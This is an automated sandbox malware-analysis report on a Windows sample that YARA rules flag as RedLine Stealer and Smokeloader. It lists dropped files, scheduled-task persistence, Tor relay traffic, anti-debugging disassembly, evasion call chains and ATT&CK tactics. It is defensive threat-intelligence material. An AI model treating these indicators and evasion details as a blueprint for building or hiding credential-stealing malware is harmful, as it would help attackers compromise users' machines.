    Source: i1lq1Qpbyw.exe, 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, i1lq1Qpbyw.exe, 00000000.00000003.305913377.0000000000880000.00000004.00001000.00020000.00000000.sdmp, i1lq1Qpbyw.exe, 00000000.00000002.308176286.0000000000860000.00000040.00001000.00020000.00000000.sdmp, llfujo.exe, 00000001.00000002.570219919.0000000000860000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/https://ip4.seeip.org/runasMicrosoft
    Source: i1lq1Qpbyw.exe, i1lq1Qpbyw.exe, 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, i1lq1Qpbyw.exe, 00000000.00000003.305913377.0000000000880000.00000004.00001000.00020000.00000000.sdmp, i1lq1Qpbyw.exe, 00000000.00000002.308176286.0000000000860000.00000040.00001000.00020000.00000000.sdmp, llfujo.exe, llfujo.exe, 00000001.00000002.570219919.0000000000860000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://ip4.seeip.org/
    Source: llfujo.exe, 00000001.00000003.490135021.00000000008C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://quetzalcoatl-relays.org
    Source: llfujo.exe, 00000001.00000003.490135021.00000000008C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://quetzalcoatl-relays.org/#support-us
    Source: llfujo.exe, 00000001.00000003.391152671.0000000001330000.00000004.00001000.00020000.00000000.sdmp, llfujo.exe, 00000001.00000003.392219387.00000000014A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.digidow.eu/onion-stats/
    Source: unknownDNS traffic detected: queries for: winstationsocks.com
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_00405F54 select,recv,0_2_00405F54
    Source: global trafficHTTP traffic detected: GET / HTTP/1.0Host: api.ipify.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET / HTTP/1.0Host: api.ipify.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus HTTP/1.0Host: 128.31.0.39User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/00c2b794f74b8759d26786ee363009c9c59088f5 HTTP/1.0Host: 62.35.195.87User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/0fb07690d64ce5c22b5175183c0e59678cdf7eab HTTP/1.0Host: 116.203.195.42User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/03000eddfeb7db6a4171d09d2df028ada6b27dee HTTP/1.0Host: 116.203.195.42User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/0fb07690d64ce5c22b5175183c0e59678cdf7eab HTTP/1.0Host: 116.203.195.42User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/1efbaccd28a07fd6ad7aa6f1293177d71397e918 HTTP/1.0Host: 116.203.195.42User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/0fb07690d64ce5c22b5175183c0e59678cdf7eab HTTP/1.0Host: 116.203.195.42User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/1eff2704d19bf45305bbcca53e2b59a3d17a6ee3 HTTP/1.0Host: 116.203.195.42User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/0fb07690d64ce5c22b5175183c0e59678cdf7eab HTTP/1.0Host: 116.203.195.42User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/1f2077bf01caf23f819d4892a89883196aba842a HTTP/1.0Host: 116.203.195.42User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/267ee437f0c28e8d0b5ddd5e0daeafc9bf0fe505 HTTP/1.0Host: 176.58.110.66User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/7a72da3127be09a802255a600cd0b4e97785f5fd HTTP/1.0Host: 24.53.51.144User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/5756d9c403d89b79afe69d50bb0682ba318319fb HTTP/1.0Host: 24.53.51.144User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/7a72da3127be09a802255a600cd0b4e97785f5fd HTTP/1.0Host: 24.53.51.144User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/1efbaccd28a07fd6ad7aa6f1293177d71397e918 HTTP/1.0Host: 24.53.51.144User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/7a72da3127be09a802255a600cd0b4e97785f5fd HTTP/1.0Host: 24.53.51.144User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/1eff2704d19bf45305bbcca53e2b59a3d17a6ee3 HTTP/1.0Host: 24.53.51.144User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/7a72da3127be09a802255a600cd0b4e97785f5fd HTTP/1.0Host: 24.53.51.144User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/1f2077bf01caf23f819d4892a89883196aba842a HTTP/1.0Host: 24.53.51.144User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/7a72da3127be09a802255a600cd0b4e97785f5fd HTTP/1.0Host: 24.53.51.144User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/32361a1efdf684daedc8ca64843767a395f9eace HTTP/1.0Host: 24.53.51.144User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/7a72da3127be09a802255a600cd0b4e97785f5fd HTTP/1.0Host: 24.53.51.144User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/32364bef873944be481e8bcc7fae9297f5f39781 HTTP/1.0Host: 24.53.51.144User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/7a72da3127be09a802255a600cd0b4e97785f5fd HTTP/1.0Host: 24.53.51.144User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/3239007ce1fb2ecdfdf2067df23b949295dc5ef6 HTTP/1.0Host: 24.53.51.144User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus HTTP/1.0Host: 131.188.40.189User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: unknownHTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:49699 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 192.9.235.157:443 -> 192.168.2.5:49701 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.5:49737 version: TLS 1.2
    Source: i1lq1Qpbyw.exe, 00000000.00000002.308217015.0000000000B0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_00403BB4 CryptImportKey,CryptExportKey,CryptDestroyKey,0_2_00403BB4

    System Summary

    barindex
    Source: 00000001.00000002.570272612.000000000091C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000001.00000002.570219919.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000000.00000002.308267503.0000000000B11000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000000.00000002.308176286.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: i1lq1Qpbyw.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 00000001.00000002.570272612.000000000091C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000001.00000002.570219919.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000000.00000002.308267503.0000000000B11000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000000.00000002.308176286.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeFile created: C:\Windows\Tasks\llfujo.jobJump to behavior
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_00B110040_2_00B11004
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_00B1126A0_2_00B1126A
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: String function: 00406698 appears 31 times
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: String function: 00406788 appears 31 times
    Source: i1lq1Qpbyw.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: llfujo.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: i1lq1Qpbyw.exeVirustotal: Detection: 74%
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeFile read: C:\Users\user\Desktop\i1lq1Qpbyw.exeJump to behavior
    Source: i1lq1Qpbyw.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\i1lq1Qpbyw.exe C:\Users\user\Desktop\i1lq1Qpbyw.exe
    Source: unknownProcess created: C:\ProgramData\dtkttiw\llfujo.exe C:\ProgramData\dtkttiw\llfujo.exe start
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
    Source: classification engineClassification label: mal100.troj.evad.winEXE@2/3@6/14
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_00405708 CoInitialize,CoCreateInstance,CoUninitialize,0_2_00405708
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_004057A9 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,FindCloseChangeNotification,0_2_004057A9
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeMutant created: \Sessions\1\BaseNamedObjects\llfujo
    Source: C:\ProgramData\dtkttiw\llfujo.exeMutant created: \BaseNamedObjects\llfujo
    Source: i1lq1Qpbyw.exeString found in binary or memory: ip-address
    Source: llfujo.exeString found in binary or memory: ip-address
    Source: C:\ProgramData\dtkttiw\llfujo.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\ProgramData\dtkttiw\llfujo.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\ProgramData\dtkttiw\llfujo.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\ProgramData\dtkttiw\llfujo.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
    Source: i1lq1Qpbyw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: ypt\tmp_1409393509\bin\woma.pdb source: i1lq1Qpbyw.exe, 00000000.00000003.306923173.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, i1lq1Qpbyw.exe, 00000000.00000000.299650512.0000000000401000.00000020.00000001.01000000.00000003.sdmp
    Source: Binary string: C:\tizuzucor12\lekudoyuxe_salo.pdb source: i1lq1Qpbyw.exe, 00000000.00000003.306923173.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, i1lq1Qpbyw.exe, 00000000.00000000.299650512.0000000000401000.00000020.00000001.01000000.00000003.sdmp
    Source: Binary string: K\C:\tizuzucor12\lekudoyuxe_salo.pdbypt\tmp_1409393509\bin\woma.pdb source: i1lq1Qpbyw.exe, 00000000.00000003.306923173.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, i1lq1Qpbyw.exe, 00000000.00000000.299650512.0000000000401000.00000020.00000001.01000000.00000003.sdmp

    Data Obfuscation

    barindex
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeUnpacked PE file: 0.2.i1lq1Qpbyw.exe.400000.0.unpack
    Source: C:\ProgramData\dtkttiw\llfujo.exeUnpacked PE file: 1.2.llfujo.exe.400000.0.unpack
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeUnpacked PE file: 0.2.i1lq1Qpbyw.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
    Source: C:\ProgramData\dtkttiw\llfujo.exeUnpacked PE file: 1.2.llfujo.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_00B13ADA push ebx; ret 0_2_00B13AE4
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_00B138CD pushad ; ret 0_2_00B138CF
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_00B15858 push 80AC85B6h; retf 0_2_00B1585D
    Source: initial sampleStatic PE information: section name: .text entropy: 7.337350654748941
    Source: initial sampleStatic PE information: section name: .text entropy: 7.337350654748941
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeFile created: C:\ProgramData\dtkttiw\llfujo.exeJump to dropped file
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeFile created: C:\ProgramData\dtkttiw\llfujo.exeJump to dropped file
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeFile created: C:\Windows\Tasks\llfujo.jobJump to behavior

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 9131
    Source: unknownNetwork traffic detected: HTTP traffic on port 9131 -> 49700
    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49703
    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49706
    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49707
    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49708
    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49709
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49710
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49712
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49727
    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49728
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49736
    Source: i1lq1Qpbyw.exe, i1lq1Qpbyw.exe, 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, i1lq1Qpbyw.exe, 00000000.00000003.305913377.0000000000880000.00000004.00001000.00020000.00000000.sdmp, i1lq1Qpbyw.exe, 00000000.00000002.308176286.0000000000860000.00000040.00001000.00020000.00000000.sdmp, llfujo.exe, llfujo.exe, 00000001.00000002.570219919.0000000000860000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: onion-port

    Malware Analysis System Evasion

    barindex
    Source: C:\ProgramData\dtkttiw\llfujo.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_1-3162
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_0-5841
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_0-6769
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeRDTSC instruction interceptor: First address: 00000000004065B9 second address: 00000000004065B9 instructions: 0x00000000 rdtsc 0x00000002 push ebp 0x00000003 mov ebp, esp 0x00000005 push ebx 0x00000006 push ecx 0x00000007 push edx 0x00000008 push edi 0x00000009 push esi 0x0000000a imul eax, eax, 001E7319h 0x00000010 add eax, 3CFB5543h 0x00000015 rcr eax, 10h 0x00000018 add eax, ecx 0x0000001a test edx, edx 0x0000001c je 00007F610CC98215h 0x0000001e imul eax, edx 0x00000021 xor edx, edx 0x00000023 mul dword ptr [ebp+08h] 0x00000026 mov eax, edx 0x00000028 pop esi 0x00000029 pop edi 0x0000002a pop edx 0x0000002b pop ecx 0x0000002c pop ebx 0x0000002d leave 0x0000002e retn 0004h 0x00000031 lea ebx, dword ptr [eax+04h] 0x00000034 push 00000018h 0x00000036 call 00007F610CC9D6F1h 0x0000003b rdtsc
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-6969
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exe TID: 4980Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-6293
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_004065B9 rdtsc 0_2_004065B9
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-5858
    Source: C:\ProgramData\dtkttiw\llfujo.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-3179
    Source: C:\ProgramData\dtkttiw\llfujo.exeAPI coverage: 7.5 %
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeThread delayed: delay time: 60000Jump to behavior
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeAPI call chain: ExitProcess graph end nodegraph_0-6775
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeAPI call chain: ExitProcess graph end nodegraph_0-6852
    Source: C:\ProgramData\dtkttiw\llfujo.exeAPI call chain: ExitProcess graph end nodegraph_1-3246
    Source: C:\ProgramData\dtkttiw\llfujo.exeAPI call chain: ExitProcess graph end nodegraph_1-3167
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_004065B9 rdtsc 0_2_004065B9
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_00401000 mov eax, dword ptr fs:[00000030h]0_2_00401000
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_00406698 mov eax, dword ptr fs:[00000030h]0_2_00406698
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_0086092B mov eax, dword ptr fs:[00000030h]0_2_0086092B
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_008668E8 mov eax, dword ptr fs:[00000030h]0_2_008668E8
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_00861250 mov eax, dword ptr fs:[00000030h]0_2_00861250
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_00860D90 mov eax, dword ptr fs:[00000030h]0_2_00860D90
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_00B11F8B push dword ptr fs:[00000030h]0_2_00B11F8B
    Source: C:\ProgramData\dtkttiw\llfujo.exeCode function: 1_2_008668E8 mov eax, dword ptr fs:[00000030h]1_2_008668E8
    Source: C:\ProgramData\dtkttiw\llfujo.exeCode function: 1_2_00861250 mov eax, dword ptr fs:[00000030h]1_2_00861250
    Source: C:\ProgramData\dtkttiw\llfujo.exeCode function: 1_2_00860D90 mov eax, dword ptr fs:[00000030h]1_2_00860D90
    Source: C:\ProgramData\dtkttiw\llfujo.exeCode function: 1_2_0086092B mov eax, dword ptr fs:[00000030h]1_2_0086092B
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_00401000 EntryPoint,CreateThread,GetModuleFileNameA,ShellExecuteA,OpenMutexA,CreateMutexA,EnumWindows,Sleep,GetModuleFileNameA,CopyFileA,Sleep,ExitProcess,0_2_00401000
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_004053B9 CoInitialize,CoCreateInstance,GetUserNameExW,GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,CoUninitialize,0_2_004053B9
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_004053B9 CoInitialize,CoCreateInstance,GetUserNameExW,GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,CoUninitialize,0_2_004053B9
    Source: i1lq1Qpbyw.exe, i1lq1Qpbyw.exe, 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, i1lq1Qpbyw.exe, 00000000.00000003.305913377.0000000000880000.00000004.00001000.00020000.00000000.sdmp, i1lq1Qpbyw.exe, 00000000.00000002.308267503.0000000000B11000.00000040.00000020.00020000.00000000.sdmp, i1lq1Qpbyw.exe, 00000000.00000002.308176286.0000000000860000.00000040.00001000.00020000.00000000.sdmp, llfujo.exe, llfujo.exe, 00000001.00000002.570219919.0000000000860000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: a2guard.exe

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: Process Memory Space: i1lq1Qpbyw.exe PID: 1716, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: Process Memory Space: i1lq1Qpbyw.exe PID: 1716, type: MEMORYSTR
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts12
    Native API
    1
    Scheduled Task/Job
    1
    Exploitation for Privilege Escalation
    1
    Deobfuscate/Decode Files or Information
    1
    Input Capture
    1
    System Time Discovery
    Remote Services12
    Archive Collected Data
    Exfiltration Over Other Network Medium2
    Ingress Tool Transfer
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
    Data Encrypted for Impact
